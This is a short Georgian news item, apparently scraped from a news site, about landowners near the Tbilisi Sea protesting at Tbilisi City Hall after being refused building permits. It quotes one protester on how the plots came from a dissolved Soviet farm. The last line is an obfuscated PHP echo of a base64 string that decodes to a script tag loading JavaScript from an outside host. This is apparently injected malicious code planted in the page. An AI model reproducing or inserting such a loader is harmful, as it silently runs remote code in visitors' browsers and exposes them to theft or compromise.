celsiusi
ავერსი საქკაბელი
თბილისის ზღვის მიმდებარე ტერიტორიების მიწის მესაკუთრეები თბილისის მერიასთან აქციას მართავენ.
 
თბილისის ზღვის მიმდებარე ტერიტორიების მიწის მესაკუთრეები, მშენებლობის ნებართვების მოთხოვნით, აქციას მართავენ. აქციის ერთ-ერთმა მონაწილის არჩილ ლაცაბიძის განცხადებით,  აღნიშნული მიწის ნაკვეთები რამდენიმე ათეული წელია მათ საკუთრებაშია, თუმცა მშენებლობის ნებართვას არ აძლევენ.
 
"მრავალი წელია ვიკრიბებით, მიწის ნაკვეთები გვაქვს ზღვის მიმდებარე ტერიტორიაზე, ავშნიანის დასახლებაში. მე პირადად ეს ტერიტორია უსასყიდლოდ გადმომეცა, როდესაც გარდაბნის რაიონის ვარკეთილის საბჭოთა მეურნეობა დაიშალა. ფაქტობრივად, უსასყიდლოდ გადმოგვცეს, რადგან მეურნეობაში ვმუშაობდით. ეს მიწის ნაკვეთები რამდენიმე ათეული წელია ჩვენს საკუთრებაშია, მაგრამ არ გვაძლევენ აშენების ნებართვას. დავდივართ ინსტანციებში და არანაირად არ წყდება ეს საკითხი. მიზეზად ათას რამეს ამბობენ, ფაქტობრივად არ უნდათ, რომ ჩვენ ეს მიწის ნაკვეთები გამოვიყენოთ. ეძახიან სარეკრეაციო ზონას და არ გვაძლევენ აშენების უფლებას", - განაცხადა არჩილ ლაცაბიძემ აქციაზე. 
 
აქციის მონაწილების განცხადებით, აღნიშნულ საკითხზე, ამ წუთებში მათი წარმომადგენელი თბილისის მერიის ურბანული განვითარების საქალაქო სამსახურის უფროსს ვიქტორ წილოსანს ხვდება.
 
1474
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");